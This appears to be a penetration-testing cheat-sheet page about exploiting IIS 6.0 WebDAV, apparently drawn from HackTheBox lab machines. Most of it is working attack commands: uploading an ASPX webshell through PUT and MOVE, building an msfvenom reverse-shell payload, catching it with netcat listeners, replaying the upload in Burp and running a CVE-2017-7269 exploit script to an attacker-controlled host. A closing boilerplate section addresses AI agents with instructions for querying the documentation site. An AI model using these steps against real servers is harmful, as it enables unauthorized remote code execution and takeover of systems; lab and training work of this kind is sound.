> For the complete documentation index, see [llms.txt](https://pentest.mxhx.org/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://pentest.mxhx.org/04-webapps/iis6-webdav.md). # IIS6 WebDav ## Microsoft Windows 2003|2008|XP * google 'iis 6.0 reverse shell' * Microsoft-IIS/6.0 * http-webdav-scan * WebDAV allows clients to perform Web authoring operations remotely. * REF: [Granny/Grandpa-HTB](/04-webapps/iis6-webdav.md) * [https://github.com/ohpe/juicy-potato/releases](https://github.com/ohpe/juicy-potato/releases%20) ## nmap finds webdav * **nmap -sV -sC -oA nmap 10.x.x.x** * Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK * Options: OPTIONS, TRACE, **GET**, HEAD, DELETE, **PUT**, POST, COPY, **MOVE** * GET - download * PUT - upload * MOVE - you can rename/move ## davtest ``` > davtest -url http://10.x.x.x ``` ## cadaver ``` > cadaver http://10.x.x.x d> ls ..list d> put shell.aspx ..403 Forbidden d> put shell.txt ..ok d> move shell.txt shell.aspx ..ok ``` ## PUT/MOVE * Scenario: * Can 'put' text - upload * NOT 'put' aspx * Can 'move' aspx ``` ------------------ Test: curl -X PUT http://10.x.x.x/hello.txt -d @hello.txt curl http://10.x.x.x/hello.txt ------------------ webshell: cp /usr/share/webshells/aspx/cmdasp.aspx . curl -X PUT http://10.x.x.x/payload.txt -d @cmdasp.aspx curl -X MOVE -H 'Destination:http://10.x.x.x/payload.aspx' http://10.x.x.x/payload.txt http://10.x.x.x/payload.aspx Command: whoami 'execute' button network service ------------------ reverse: msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f aspx > reverse.aspx curl -X PUT http://10.x.x.x/reverse.txt --data-binary @reverse.aspx curl -X MOVE -H 'Destination:http://10.x.x.x/reverse.aspx' http://10.x.x.x/reverse.txt curl http://10.x.x.x/reverse.aspx http://10.x.x.x/reverse.aspx nc -nlvp 4444 ``` ## Burp ``` Proxy 10.x.x.x: 80 Burp > Intercept PUT > Send to repeater PUT /ippsec.html HTTP/1.1 this is a test http://10.x.x.x/ippsec.html .. works! msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 -f aspx copy/paste the text of aspx msfvenom paste into burp (bottom) PUT /ippsec.html HTTP/1.1 ..html ok PUT /ippsec.aspx HTTP/1.1 ..aspx forbidden! OPTIONS / HTTP/1.1 ..shows list of webdav options MOVE /ippsec.html HTTP/1.1 ..move html Destination: /ippsec.aspx ..aspx! http://10.x.x.x/ippsec.aspx nc -nvlp 4444 Connected! ``` ## iis6-exploit * CVE-2017-7269 * iis\_shell.py * iis6-exploit-2017-CVE-2017-**7269** * * usage: iis6webdav.py RHOST RPORT LHOST LPORT ``` > nc -nvlp 4444 > python ./iis6webdav.py 10.x.x.tgt 80 10.x.x.me 4444 ``` ## Windows 2003 Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:\ --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://pentest.mxhx.org/04-webapps/iis6-webdav.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.